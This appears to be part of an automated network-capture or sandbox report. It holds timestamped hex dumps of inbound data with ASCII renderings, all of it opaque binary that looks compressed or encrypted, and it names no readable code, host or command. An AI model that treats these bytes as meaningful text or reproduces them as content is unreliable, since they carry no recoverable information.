                                                                                                                                                2022-09-29 12:51:53 UTC30933INData Raw: 17 c3 18 89 c9 2e ff 20 da 78 4d 06 0c 28 d7 39 88 98 dc 71 97 76 88 b3 0e d5 64 4d 84 ac 16 ac 1a 18 1b b1 c6 23 09 78 f7 83 c3 14 dc 52 52 29 06 77 dc 73 72 ff ce 94 e6 94 30 79 fd d2 65 c4 5e a3 e3 82 36 59 62 29 dc 1a cf cc 01 5a 86 9f 82 9b 14 e8 61 3a df 2f f9 04 5c e0 b0 9c 69 8d a2 9c 4d 8f 68 c2 e2 dc 74 7c 1e a8 fb ef 5a cd 0c a2 41 ad 33 a9 96 cc a5 6f 6d 83 ca 6a 5c fd da a0 48 2a f7 16 eb 91 0b ac 00 1f 4a ba d9 79 d5 91 16 81 3b 9c f0 48 03 09 8b cf 5a 6b 4e e8 7b 78 9c 8e 7c aa 7a 0f 07 f5 69 22 64 c0 9d 53 18 8e 84 92 4d 7f 5f 5f a2 03 36 71 d4 49 48 50 15 84 b6 14 47 be 4c 97 33 56 a8 ea 14 05 de 38 3a dd 8a 08 a1 e4 87 28 3b 5e f0 9d 01 1b bd 09 b7 c5 4f 63 8a dc e5 66 88 76 50 81 e5 d3 c2 7d f4 87 e4 ff 06 cc 70 b4 6e df 6a a8 a7 97 f7
                                                                                                                                                Data Ascii: . xM(9qvdM#xRR)wsr0ye^6Yb)Za:/\iMht|ZA3omj\H*Jy;HZkN{x|zi"dSM__6qIHPGL3V8:(;^OcfvP}pnj
                                                                                                                                                2022-09-29 12:51:53 UTC30949INData Raw: ee ec b7 6f 72 b8 cf c8 2c fe 86 be 06 13 3b 81 88 ab c6 6e 2f f3 65 af 34 74 2a 90 d8 db 2f a8 e5 f6 18 9d aa cd 11 54 1d 80 56 45 3c 19 9d 8d 05 2d 1e a1 35 5e 75 90 88 67 70 fa ef ea 79 5c ca bc 41 c7 b1 53 02 21 f7 11 63 a5 98 78 26 6e 5d 9c ab 59 46 a1 88 d0 d1 ee fd 4f 53 cf 1c 0b ed 0a 03 ab aa f8 c1 a8 1c 41 dc b6 b6 13 d0 e3 7c cb 37 56 72 3d 1e 96 ec 89 0d 44 61 18 1a 7f ff bd 3b 1d fd 08 61 fd b6 07 ba 9b 94 1d 70 6b aa 9d 04 03 4e 64 ee 1a 04 1f 45 15 0d 9b ae b0 98 bb c3 7b 5e 56 ca fc 42 90 c0 00 77 c7 59 c2 09 83 21 28 27 f7 22 0a df b1 14 7f b5 1a b2 7a 7e 5e c7 9d ed 46 93 70 12 22 3b 92 03 bd c6 2b fc d8 8e 17 57 9e 72 50 b6 5e 71 58 f9 6b 63 d8 dd 26 64 2a 32 97 d4 fe f4 46 5b e8 63 4c e9 cf fb de be a0 57 30 f3 bd c0 ba 3f b5 05 02 2e
                                                                                                                                                Data Ascii: or,;n/e4t*/TVE<-5^ugpy\AS!cx&n]YFOSA|7Vr=Da;apkNdE{^VBwY!('"z~^Fp";+WrP^qXkc&d*2F[cLW0?.
                                                                                                                                                2022-09-29 12:51:53 UTC30965INData Raw: 6b 57 f0 ae ba e4 fe b3 2c bc a0 76 db 1a cf 7d aa f1 17 ff 50 ac ac e0 9a 58 e8 ae 23 70 e8 c1 63 4f 66 93 85 81 04 47 3b 2a 0a 17 a2 38 9a 75 8b 21 86 4c 1f 8b f9 7b 80 be 2d bb e8 a4 a2 90 10 03 aa fc 34 9e 73 44 d5 d3 2b f0 64 bb 42 c0 f7 cc 59 54 2d ab b9 68 d5 79 bf 19 c0 c9 2d 96 ed 4c 74 b3 8e 4f 33 f5 bb 4e eb 4d df ad e4 a9 3f 01 45 01 ab a9 73 eb 24 40 ec 6d b1 1f 1d b4 44 f4 bc 0d 7e 3e 8a b8 1e 9e c3 89 cf 7b 6e 92 69 56 b5 38 5a 7d a8 3b 0c 80 56 78 20 d3 62 33 73 e3 7d 91 3d 16 97 89 1a 9f af dd b5 8b 9a 00 9a fb a6 0d f4 a7 97 fc d3 a4 a6 43 98 e0 f8 cc 55 75 84 d9 af 90 29 d0 ef bc 0e 95 61 e7 47 48 ec 39 ab 57 d4 b4 45 af c5 2d 20 69 c0 e9 db 83 be 12 f5 b5 61 88 cf 67 87 81 07 30 80 de 4a d4 f2 79 c7 c5 50 2c d6 46 13 ad 5a be b4 13 32
                                                                                                                                                Data Ascii: kW,v}PX#pcOfG;*8u!L{-4sD+dBYT-hy-LtO3NM?Es$@mD~>{niV8Z};Vx b3s}=CUu)aGH9WE- iag0JyP,FZ2
                                                                                                                                                2022-09-29 12:51:53 UTC30981INData Raw: 68 2e 73 d4 99 5c 0f c1 9e 6a 99 14 69 4c ee b7 c9 17 6a 15 cd a1 77 f2 83 9f 86 46 40 53 88 1d 21 6f e4 8a 71 38 15 46 ba ae 2c e7 72 ac 41 dd ab 17 8e f4 d3 77 4e 4f c2 80 8f 03 4d c9 03 d0 88 31 8c f1 ef 5a 48 7e 51 2a 9e 5a f0 30 89 f4 79 78 c2 d8 cb c9 44 21 7d 7e 4c c7 80 41 49 b7 33 e9 1c d1 d6 d7 94 20 0e d8 3e a7 90 43 12 5f 5e 82 cd 89 2a 74 a2 f7 ea 20 a4 c5 af 22 b2 0c 4d 2f f5 19 2d d1 3a 24 46 2f 64 5a 6f eb cf a4 0f 96 9f 8c 30 cc e9 67 89 51 d8 11 26 98 aa 0c 11 f7 17 6b d6 ee 74 66 c6 f6 e9 e7 d2 31 6e ce 43 b4 72 9e 77 df 46 ba 31 25 8d d4 fe e1 f8 bb 3d d1 5f e2 cb 56 a5 46 11 50 99 96 58 2d 3d 7d 37 6b 77 f5 6a 70 a0 4c 7f 3b 7d f8 df ef 43 2f b6 4a 4e ef f8 9e dc 97 45 db e3 21 85 22 30 8d 70 76 b6 0a 1e b3 30 91 45 a8 9f c8 f2 40 9b
                                                                                                                                                Data Ascii: h.s\jiLjwF@S!oq8F,rAwNOM1ZH~Q*Z0yxD!}~LAI3 >C_^*t "M/-:$F/dZo0gQ&ktf1nCrwF1%=_VFPX-=}7kwjpL;}C/JNE!"0pv0E@
                                                                                                                                                2022-09-29 12:51:53 UTC30997INData Raw: 38 50 02 44 23 8c e4 8b 7b 07 29 d7 49 c9 52 65 07 61 94 ca 0b ea e0 9c 4f 3e 6a ea e6 cf 71 86 27 2f af 52 ab 07 80 f7 92 27 f0 98 a1 03 55 cf fc 22 2f d1 c4 6c b3 25 1c 60 e8 f3 35 54 91 64 0f 3b 22 21 8f 4c f7 f9 4f 3c f0 e6 2f 74 5b 9e 33 a6 2b 87 27 66 81 fd 71 e6 76 59 44 57 d0 c9 a8 d3 d0 8c 3f 0f ba 9d 9a 86 84 62 20 cf 7d c8 86 b6 a3 f4 11 45 b7 ed 70 99 c2 5f d5 f1 7c 6e 52 98 db e5 f5 9b 40 07 86 f1 b7 69 dc 8d 03 e6 88 6b 98 17 f0 ec b5 4e c0 67 8a cb be fe ee c1 0a 79 2b ec d7 8e 7d 58 bc 01 5b 00 6c 67 ba 54 e2 dc 1b 70 16 4e d1 9d 76 60 35 a8 b1 82 28 5a 23 cb 11 7a c9 b2 88 dd ee 6e 76 2f 82 06 1f 6f 52 fa 0f 8e 1e 07 42 f0 0d 2c cb 6b fd 06 a9 e0 9a 97 24 bf bb fc d8 75 a4 44 75 3d 12 f9 c2 c5 fb 96 1c f7 ed a6 17 51 bf 18 4c c7 df 00 03
                                                                                                                                                Data Ascii: 8PD#{)IReaO>jq'/R'U"/l%`5Td;"!LO</t[3+'fqvYDW?b }Ep_|nR@ikNgy+}X[lgTpNv`5(Z#znv/oRB,k$uDu=QL
                                                                                                                                                2022-09-29 12:51:53 UTC31013INData Raw: b3 56 57 58 e3 1e ce d5 1f 7d 22 77 e4 e3 71 59 fe 66 3b 47 69 72 43 ea 75 dc 10 99 45 a5 4c 94 e6 9e 26 bc 5d e6 8e 8a da fb 2a 76 07 96 4b 69 cc 66 4f b1 ec 75 aa bf bc f3 17 6c b5 4b ee a2 a7 b4 44 54 a0 97 00 89 65 11 34 0d 97 c2 5c 15 eb 8f 2f 3b fa 1c 5d e2 1e 9f 85 04 ba 4f b5 87 8b 7a e1 84 39 82 92 e1 b0 c4 d7 47 01 fe de 2c 26 d9 92 bc 2f ba 7e 90 d9 89 c1 e3 ed 11 75 f4 ae 91 2c b4 8b 85 de 7e 6e 0a 4b b2 27 09 52 03 e6 8b 65 c0 a7 8e 1c 25 fc 86 45 2a d0 0c e6 79 80 99 40 fe 16 a9 d2 f5 a5 f9 ac 73 d9 08 ab ec ed 03 69 3f 0b d3 bb 88 e0 91 38 ac aa c9 1b c9 38 7f b6 71 f4 1d 07 5d 0a ab b4 76 2c 13 f9 6f 86 62 19 46 a9 29 00 e7 92 e8 58 93 fd 59 1e 02 52 59 22 9b ae d5 a1 2d c2 7a 3f b3 8e d3 d9 34 69 31 a6 d5 18 bf 91 c8 bf 8a c0 96 c1 db 4c
                                                                                                                                                Data Ascii: VWX}"wqYf;GirCuEL&]*vKifOulKDTe4\/;]Oz9G,&/~u,~nK'Re%E*y@si?88q]v,obF)XYRY"-z?4i1L
                                                                                                                                                2022-09-29 12:51:53 UTC31029INData Raw: 2a 40 cc 84 56 62 6a 7c 27 28 85 b7 7b e1 de a5 d7 ac de c7 83 5a 21 61 17 60 25 c5 77 52 fc 21 c4 40 96 f8 ab 81 b9 72 04 d5 6e 25 f9 24 30 6f 97 ad cf fe cf 12 af 58 b0 65 11 5f 0d ec 2c dd 99 99 d2 96 0f 3f f5 ca ba fd b2 a1 02 5a 39 09 bb c2 f2 be d9 55 02 4f e9 f6 ab 76 45 b6 9a 5c 6b 41 91 64 cb ea 3f 61 bc 96 95 3f 1e b3 d7 7f 00 5a 86 0b ac 6b 65 52 a6 82 5b 87 ec 1d 6c 0b 98 b5 3e 07 d7 3f 6d 8c 1f 87 cf 64 0c 16 86 ea e6 f2 99 27 6e a8 58 dd 99 81 02 d2 9b 4a 5e 72 a7 ca 41 ed ed cf fa 9c 82 35 27 f0 5a 2f 79 82 e3 71 88 2f 62 6d 11 ec 89 4d 1a 6b 9d 55 50 94 5f ae fc 76 58 bc 18 84 93 00 13 03 11 72 29 8f cd 0e 8a c4 07 18 a0 16 47 53 bd 01 3c 10 dd 15 bc 83 04 20 fd 22 1f 0c ca a1 86 d9 53 7b 19 f5 39 c7 b0 35 76 19 fb b0 e4 24 92 2f 0b a4 f0
                                                                                                                                                Data Ascii: *@Vbj|'({Z!a`%wR!@rn%$0oXe_,?Z9UOvE\kAd?a?ZkeR[l>?md'nXJ^rA5'Z/yq/bmMkUP_vXr)GS< "S{95v$/
                                                                                                                                                2022-09-29 12:51:53 UTC31045INData Raw: 95 b9 2b 51 6a 5b c8 66 2e 15 7a b1 59 02 24 08 f1 da f9 4b 06 13 a3 0b 58 9e 9f 4c d9 32 c1 18 f7 3f a5 7c d8 a6 4a 11 9d 6a 55 8a 70 f0 17 e1 52 bf 5d c8 bf f3 48 a0 a6 16 f8 d6 14 2d ca 09 3c c0 d0 fa 82 8e f7 66 ea f4 ce ed 52 9e 71 4f a8 7f 24 77 9a a1 46 48 8a 6d fe ed e5 be 2e a7 96 e8 1a 9e c5 e9 45 d5 ad c0 a1 69 3e e2 06 2e d6 41 6d 75 3c ce 41 2e ab 54 ea 46 95 0b c9 c0 0c 96 20 7d d0 2b 7c 7d 81 9b 75 51 33 b1 53 50 f6 ff 44 f0 b1 17 b8 c4 02 34 c8 72 56 e0 1a 21 a0 da 89 dc 36 db 62 08 cf d9 f8 b5 ce 76 88 60 74 2c c1 6e 91 34 9c fc 29 28 21 85 f1 48 dc fa d9 14 3c d1 75 5e 69 56 10 f9 77 f2 a1 55 3f 6f b8 cf b6 89 94 8c 03 86 1f 4b 1d c7 76 17 60 61 f3 38 94 33 a7 2e d9 5f 38 f4 5d dd 1b 7d 57 f8 13 94 af 21 c0 53 b2 c3 ae 40 a2 1d 43 64 34
                                                                                                                                                Data Ascii: +Qj[f.zY$KXL2?|JjUpR]H-<fRqO$wFHm.Ei>.Amu<A.TF }+|}uQ3SPD4rV!6bv`t,n4)(!H<u^iVwU?oKv`a83._8]}W!S@Cd4
                                                                                                                                                2022-09-29 12:51:53 UTC31061INData Raw: 6a 32 75 9e 81 94 63 e9 84 f0 f1 7d a3 03 d2 3a 37 fc d8 00 5a bf 3d 90 b2 af 15 ba f3 09 79 e1 35 cc 34 57 ed 1c 11 74 fe c1 41 70 86 5b 24 dd 2b 19 20 7b 77 a6 0e 1c 87 9d 8b 51 5f 89 f1 8c 81 b5 9c 32 d0 9b 27 07 15 b6 85 24 59 dd 0d 89 af 33 86 b5 4c b5 87 24 e3 4d bd f7 d9 af 2d f2 de a5 06 46 cb e2 4b ec 6f cf 74 81 80 0c 92 e4 0a 4f c6 88 3b 36 2b 14 a3 c9 fe 22 a4 c4 88 f3 45 77 52 73 69 9e 58 7c ea 99 4e a1 10 fd 6d 67 fd 82 f1 22 11 87 66 8b 5c 5b c2 29 c9 91 98 27 89 cd d1 b0 4e 53 08 03 a7 4f 6d 78 17 ed 52 5d 4c 88 56 53 9b 2c da 18 f8 49 59 22 25 b2 b0 66 c5 67 44 55 27 4c 9a 8b 5e 62 64 d0 45 b6 c0 e0 9b ff 4e 4b d7 81 a6 d8 0b c0 e5 a1 77 ac 6a ef fb 2e aa fe 23 ea 23 bd fc 48 c2 8e 65 e8 f7 8f b4 22 09 5b 4b 90 71 83 1d 30 64 51 41 e4 29
                                                                                                                                                Data Ascii: j2uc}:7Z=y54WtAp[$+ {wQ_2'$Y3L$M-FKotO;6+"EwRsiX|Nmg"f\[)'NSOmxR]LVS,IY"%fgDU'L^bdENKwj.##He"[Kq0dQA)
                                                                                                                                                2022-09-29 12:51:53 UTC31077INData Raw: f2 87 35 ad d0 03 e2 23 7e b3 1c d8 ec d8 77 ff aa c3 4c 0d 80 73 87 ec f2 53 80 fd 0c c5 68 f0 69 1c 45 e3 25 c3 25 29 b6 fa 58 a0 3a 21 11 5b a9 2a b5 9b 98 9b d4 39 0d 21 f4 dc 38 2f e5 fa 1c 4e bf f9 32 f5 72 ed 5b 9a 71 38 fe f2 6a ef 4d 7d e8 bc 2a de 62 58 a8 0c 6e 6a 14 12 df 0a 2f 60 bd 6c c3 92 4b 0c 60 c6 ba 59 49 7d cd a6 59 a6 49 84 a3 32 9e cc d9 d6 60 27 e9 72 c4 e8 b0 2a 49 5d 86 03 f9 7e 18 32 2f 04 61 74 7a e7 69 24 a7 a2 ad e1 62 45 60 f8 53 bd 16 1b 4f 25 d4 af 72 db d1 8f f7 39 57 60 cc d1 98 b9 a6 de 44 62 c1 44 a2 81 e1 a4 4a b3 5c d6 06 4e 0d 64 e6 61 c6 18 03 28 aa 89 67 74 9d c5 5b 41 a8 08 74 0a 58 5d ec 4f 19 54 9e 55 14 8b 6a 4b 9a d2 a5 0d c0 0a e6 a2 6a 2c bb f3 f4 f6 43 ad e7 3f c3 ae 91 d8 66 33 3a 5a 14 54 2a e8 be ce 18
                                                                                                                                                Data Ascii: 5#~wLsShiE%%)X:![*9!8/N2r[q8jM}*bXnj/`lK`YI}YI2`'r*I]~2/atzi$bE`SO%r9W`DbDJ\Nda(gt[AtX]OTUjKj,C?f3:ZT*
                                                                                                                                                2022-09-29 12:51:53 UTC31093INData Raw: fc f6 3e 62 f7 d1 ad 77 69 a0 e4 35 c7 94 74 a4 dd ac ad 43 fe d3 fc b4 c0 f6 df 19 e2 0c f2 31 49 a8 a3 e1 21 00 cf ce 2f 6a 14 fd cf 04 0a 0a 07 b5 b3 26 6c ae 57 c2 02 6b 9d 48 d4 e4 8c 16 ef b9 32 c9 2d c8 fc 00 80 de f3 77 62 ea be ef 72 23 4e 04 10 52 8a 40 6d c8 e3 50 ab ba ca 15 a8 f2 b6 aa 5b 7b e6 9a 82 50 94 50 0d 78 93 2a a8 b8 d7 8c 34 c3 c1 92 5c e9 22 41 50 3f bb 1a 6c a1 f1 9c 68 87 c0 d7 de 1a b5 16 6b bc c0 65 38 67 bc 52 47 d5 e3 01 c5 46 8a d7 ca 5f 9a fa b7 af e1 f7 98 3e f3 b8 d8 00 65 08 dc 7a f7 3c 24 89 7f 0d fa 10 9d d3 f3 26 27 6a 7e 11 29 05 49 e4 95 ca 5e ba 83 fa 3c aa 3b e3 1f ba c0 34 86 cc 6b 43 22 b4 f2 b8 42 3c 5c 05 0a d3 d9 1d f8 f9 ea 47 13 c0 3e 5a ab e8 8a d7 a5 4e fe 30 1c 09 bd e1 82 e2 26 d2 b9 84 e4 9b 9c f5 8f
                                                                                                                                                Data Ascii: >bwi5tC1I!/j&lWkH2-wbr#NR@mP[{PPx*4\"AP?lhke8gRGF_>ez<$&'j~)I^<;4kC"B<\G>ZN0&
                                                                                                                                                2022-09-29 12:51:53 UTC31109INData Raw: b4 0a 25 e6 05 40 77 24 dd 6c a4 41 a2 44 de 75 34 cf f7 7e ed 80 44 15 1e 6e cf ce b7 d9 17 12 96 e3 94 48 d7 2d e2 5d 01 ab 06 67 f9 35 25 6b a9 73 16 62 76 52 45 9d dd 2a 62 b1 f5 29 5c 50 7a 2c c9 ed 51 a3 7f 20 09 09 d4 5e 4b 98 50 39 52 f7 1b 83 83 1a f4 46 0e ea c0 77 09 7d 85 3c 4d 40 a7 03 8b 12 37 54 60 96 40 15 b4 db 70 5b d9 16 7a 36 ed 8a fc b4 db 23 e8 42 dd b4 f1 85 ea 93 cc 6a c6 98 16 1f 88 02 a7 b2 56 33 11 f5 52 a2 43 28 51 f1 ea af 43 fb 0f ec 0d 2f 56 4c f1 05 f5 51 cd 2d f9 b2 3f 5c 87 89 e4 e6 54 d5 7a 11 57 ae ab f6 58 94 b4 16 3b 80 b4 71 90 51 52 1f cc 63 5d 37 a9 8b af 05 78 15 17 33 7e 65 e0 03 43 83 41 3b 5d 13 c7 d8 fe 59 c3 81 5a 94 ba 7e a7 a6 6b 67 07 56 a4 c8 79 7c 37 81 38 da b5 52 88 32 5f ec 2c b2 90 79 d1 77 07 ea c2
                                                                                                                                                Data Ascii: %@w$lADu4~DnH-]g5%ksbvRE*b)\Pz,Q ^KP9RFw}<M@7T`@p[z6#BjV3RC(QC/VLQ-?\TzWX;qQRc]7x3~eCA;]YZ~kgVy|78R2_,yw
                                                                                                                                                2022-09-29 12:51:53 UTC31125INData Raw: 08 c3 d4 ba 13 c9 2e 58 9f 0a 3b cb 18 33 b4 4b 80 0a b8 f2 da 21 f5 74 be 29 e8 f1 1f 76 01 ba 23 5b 99 b7 c4 e3 00 ad fe a1 98 dd c1 5f 1e 7a 5f 9a 63 92 6d cd 14 23 33 ad b2 b6 7f 13 60 39 fd ba 93 d1 9c c1 4d 36 d9 0f 60 8e b9 77 8f 23 d5 28 a4 28 20 37 9c 78 ab 63 72 63 8f 4a 68 45 c9 9d a5 77 ff 1b 1f a4 c6 e3 31 9c f2 f6 ca 4c 88 df 24 a6 e1 13 4b 6e c3 46 22 e3 be 15 fe 4f 33 5b 23 f2 40 2c 21 15 6b 12 a4 f4 16 01 c1 25 1c 90 af de da 59 bb 2c 06 af 31 5e 4a 94 12 b7 ee b2 45 d8 46 c0 e6 d2 45 c2 66 54 e5 f9 69 93 38 76 5c 3a af c6 23 85 7c 7c c7 2e 79 c0 e6 6a b0 04 3b 89 32 27 cf 0d 44 6d ac 79 d4 27 5a 71 29 a3 6b f0 47 bf b7 db bf a6 42 7d a9 c5 e3 c6 15 3f 87 77 29 d6 74 f0 2b 0a f5 45 90 e5 c7 19 4f 2a 0e c5 be f3 7e 0a af 80 10 e0 a2 61 ad
                                                                                                                                                Data Ascii: .X;3K!t)v#[_z_cm#3`9M6`w#(( 7xcrcJhEw1L$KnF"O3[#@,!k%Y,1^JEFEfTi8v\:#||.yj;2'Dmy'Zq)kGB}?w)t+EO*~a
                                                                                                                                                2022-09-29 12:51:53 UTC31141INData Raw: a1 00 81 ed d3 88 95 c6 41 20 68 80 4c 4c 95 40 26 41 fb a1 2e 5e df 5a 39 51 3e 45 0d cc 2f 8c db fc 26 18 97 38 5a 72 6b d9 85 42 dc b9 80 55 81 29 53 00 9e 35 b9 f8 f9 4b b6 84 58 36 e9 18 c4 e0 0a f9 6e ff f4 f5 c6 1b 8d b4 41 42 12 38 f5 c4 31 ab fd db 0c 07 33 85 2c 6a 4d d1 ad d0 0b 89 a5 bb 08 5a 67 fd 3e 29 87 03 42 60 b3 36 7f 8b f0 fe 57 71 00 8a 50 7f ad e0 52 14 f1 17 1e cf b0 89 03 01 d1 e0 8f 61 40 04 35 9a a3 75 99 c6 a6 4c 0b a0 98 a5 41 53 c5 77 da f5 fd 63 da cd b1 5a 83 a8 4e 57 8a 09 1f 90 3a 40 3f 0d bb 87 0c 64 95 b0 72 e4 f0 0a 16 7f 9e 08 fa 3e 73 1d 5a 2a 6f b6 d8 83 d0 06 ae d9 a4 54 a4 a7 87 81 43 b8 a8 4d 91 c1 cc 84 5f c1 91 0f 99 62 e3 f0 77 c7 e4 28 62 1d 67 f4 04 8a 33 ef e9 49 09 69 f5 18 47 34 86 81 b2 94 f5 60 9b bd 4e
                                                                                                                                                Data Ascii: A hLL@&A.^Z9Q>E/&8ZrkBU)S5KX6nAB813,jMZg>)B`6WqPRa@5uLASwcZNW:@?dr>sZ*oTCM_bw(bg3IiG4`N
                                                                                                                                                2022-09-29 12:51:53 UTC31157INData Raw: 24 f2 32 fd 78 9f da 12 a4 59 2e 6a 15 03 e8 6b c7 b7 e0 71 f5 ac 4b 7f 56 ab 65 b5 b7 da 67 60 25 df 50 6a 0b 7d bd 33 55 4b 93 eb d8 90 aa d0 05 e0 7a 27 9b 2e 17 d6 86 3a 60 f2 dd 77 a7 42 22 fa 9d 41 19 95 37 f6 09 73 93 6e b7 fa d1 fa d1 8c 23 3e 90 8a 19 e6 0e 04 80 71 e4 dc af 96 35 0a 94 42 d1 c7 b7 c2 bc ac e4 5d 6c e1 40 ff 93 32 73 c0 93 96 e1 77 b1 80 ec 4b 18 bc 0e d6 9c 66 df 18 6c 7c e6 78 c3 b9 ba 83 5f ff f4 5c b9 50 a1 bd fa fc 94 e7 dc 4a b4 a1 28 4c 3f bb 7b 31 24 f2 8e 91 47 e0 04 e2 c3 3e 28 4b ad 4f 33 22 cc ab be 46 3d d0 54 98 cf ab 87 f3 94 78 76 15 26 aa 79 3a e0 42 36 c0 1b 27 05 82 ae 6d 34 30 4f 1e 07 53 cd 0f f9 3e f0 c7 40 29 f8 4a 4b e9 59 a4 b9 3c 7b bb 07 dd ab 9a c7 c3 01 0e 73 2f e5 85 f1 0b 93 69 44 97 7d 08 f0 7f 41
                                                                                                                                                Data Ascii: $2xY.jkqKVeg`%Pj}3UKz'.:`wB"A7sn#>q5B]l@2swKfl|x_\PJ(L?{1$G>(KO3"F=Txv&y:B6'm40OS>@)JKY<{s/iD}A
                                                                                                                                                2022-09-29 12:51:53 UTC31173INData Raw: 66 1d 2c 5b 32 1c 29 7c 9f d6 d9 e3 5d 32 74 d5 a6 e5 98 5b 62 1d 0c c5 a3 fe 16 0a fa dd c1 66 1f cd da de b4 20 df 34 8c 65 05 fd e4 97 83 50 90 94 7f fd 83 ac d6 59 62 bc 51 21 25 d6 17 82 a9 89 70 3e 74 f8 f5 d3 0b b7 24 b7 c7 42 0f 32 51 7a 50 bb 03 e0 86 03 af b9 a4 13 63 73 48 46 d2 01 50 c4 5c c0 d7 65 6b 14 07 fa 10 f7 73 e4 12 fd 0e 46 e5 16 93 82 15 b5 8c 52 bc 3e f8 60 28 3c e6 1e 65 45 dd 59 33 0f e7 14 6c cd 1a 0e 55 59 bf 57 13 0b 70 ad f1 33 af 9c c2 28 6d c2 c6 0f a0 8d 3a 1d ec 62 0e cf a5 b1 d5 8d 40 8d 3a 82 b2 f7 e2 88 97 50 e1 5b 85 7e 5d 67 1a 85 7a 6d 0d a8 59 bf 25 74 bf 35 fa 5d 67 7a 56 30 39 81 03 1e c6 4c e3 8b ae d6 e2 01 72 5a 9d a7 aa 22 fb e5 58 ca c4 2b 2d a4 73 73 52 c8 4b 8b f9 fd 49 92 a0 c9 b2 4a 62 88 fd 00 5e ce 5a
                                                                                                                                                Data Ascii: f,[2)|]2t[bf 4ePYbQ!%p>t$B2QzPcsHFP\eksFR>`(<eEY3lUYWp3(m:b@:P[~]gzmY%t5]gzV09LrZ"X+-ssRKIJb^Z
                                                                                                                                                2022-09-29 12:51:53 UTC31189INData Raw: 0d 25 ac 18 4c c4 e0 e8 b0 11 a0 13 04 ce 80 f5 9c 9a d1 25 17 c6 13 ea 97 39 96 7b e0 07 c8 d6 67 4d 65 ff e8 00 f3 8a 74 ff e5 83 f9 c7 9d 18 8d df a5 d0 4a 4e e7 36 6d f8 fc b2 a2 bb d8 84 0d 4e e5 68 0f 48 3f 7c 06 34 34 af 07 0e 8f 12 26 61 4c 91 ce 0f 43 62 67 c6 ed b2 64 97 b2 7b a7 b9 0a 1f 4f 53 16 87 30 a6 71 8f c4 58 3d 09 a1 4d b9 44 9a 01 da ab cb 2a 9e 73 84 d2 f6 fe f8 6f 64 61 9b 45 e7 aa 5a 9d b9 2f 72 20 3f 66 26 9a 73 7b 28 9e eb 69 9f f0 7d dc 46 4f 06 1f 72 80 d0 5b 07 be dd 6e 16 8c 22 ee 52 fe 76 6a 3b 9c d9 49 fc 99 cc f4 51 ec aa 94 93 f1 c2 5d b6 15 61 bc 26 c7 f5 ba 02 22 fc 4b c3 52 2b 38 36 eb a7 ab b6 09 25 3a c9 f3 88 57 76 f0 a7 1c b9 8c 74 98 ae 21 76 1a 02 5e d1 ae b9 da 86 37 f1 2f ec 5b 0c 61 3d a2 74 8e d4 cc 19 2f 3d
                                                                                                                                                Data Ascii: %L%9{gMetJN6mNhH?|44&aLCbgd{OS0qX=MD*sodaEZ/r ?f&s{(i}FOr[n"Rvj;IQ]a&"KR+86%:Wvt!v^7/[a=t/=
                                                                                                                                                2022-09-29 12:51:53 UTC31205INData Raw: 74 63 61 bc b5 07 4e 11 5d e8 8a 27 2d 8e 61 72 87 0c cb 8b 5a b4 21 c1 c9 b8 ce ad fe bf dd cb 8e 8c 0e aa c7 c2 ab ed 52 d6 81 3b ad 43 02 78 e4 7e ce b0 ea 54 21 1c aa 2e 16 8d 54 ab fd 42 3a fa 5f 65 90 c5 60 ba 5b 9d 79 81 67 f8 35 fe 5c 67 63 0a cf 5a 1d 14 fd 75 44 a7 c7 ef 98 c1 a8 0f 6d 9f a6 52 21 cb 6c 99 1c 72 20 2e ee e4 97 95 7c 4b c0 1f 97 d5 2c ec fe 07 a4 b3 98 59 8b e0 bf 8c 70 00 b6 4c bb c0 54 1f 4b 1d 41 9b bd 43 94 82 2e fa 1d af d9 f7 6c ef 6b 61 23 b8 d1 fd dd f2 47 dd ce 57 d3 7f 6a a7 ef d9 48 43 16 cb b5 44 61 9a 6c 7f 8c 73 2c 05 fc 32 58 2e 97 56 30 d3 27 68 17 69 55 f5 6f 47 df ff 20 a3 ee b1 51 6e 91 c8 45 0b 7b 5f b7 84 5c 56 c5 59 c3 f1 84 bf 42 90 13 dd a8 df 48 bf 83 6a a6 a1 e2 06 c9 28 fc 24 fd e9 4c 13 de 85 2d f7 90
                                                                                                                                                Data Ascii: tcaN]'-arZ!R;Cx~T!.TB:_e`[yg5\gcZuDmR!lr .|K,YpLTKAC.lka#GWjHCDals,2X.V0'hiUoG QnE{_\VYBHj($L-
                                                                                                                                                2022-09-29 12:51:53 UTC31221INData Raw: 37 97 ee 01 08 2e 93 40 af bd e2 b6 1a a1 01 0f 06 0d 07 1d 89 09 33 cb 82 09 ef b4 7a 7e e6 cd 8b 3c 90 a0 c6 03 6e ff 21 b8 fe 6b db cb 9e fd 2f e1 44 59 bb c0 fb df f0 e2 8b 03 36 cd 84 93 2a 8d 38 da a2 30 d4 a1 04 cc 4c f6 e2 5b 45 01 9b 2c 27 87 12 0c 1a 05 7f 69 73 40 2a 9b d9 b8 7e 90 59 a4 ad 4a 45 64 00 9e 7a 95 8b 2f 0c 62 ee 73 19 ee 21 40 a8 27 90 5e 21 10 85 cd 62 41 63 18 9a 1e c2 b8 c2 82 76 32 83 76 25 4e 2a 53 1c fb bd f6 55 3f d7 7b fc 83 95 46 ab c5 04 f4 a1 e3 9a 8f f0 06 b7 55 21 59 ad 25 d3 e3 16 14 ac 4b 4c 9c 93 42 50 2e ad 81 dc 1e 07 b0 06 5d 1c ac 3e 41 39 e1 82 ca e6 5b 5f 73 fb 57 50 d1 b6 cf 67 1c c6 b1 73 e5 53 13 32 ea 35 af c4 e9 a5 1e f9 5f 7e 58 7a af 34 3a a9 d3 69 a8 b6 5b 5c b3 4d 34 03 db 24 e7 b3 3a 28 93 04 bc 98
                                                                                                                                                Data Ascii: 7.@3z~<n!k/DY6*80L[E,'is@*~YJEdz/bs!@'^!bAcv2v%N*SU?{FU!Y%KLBP.]>A9[_sWPgsS25_~Xz4:i[\M4$:(
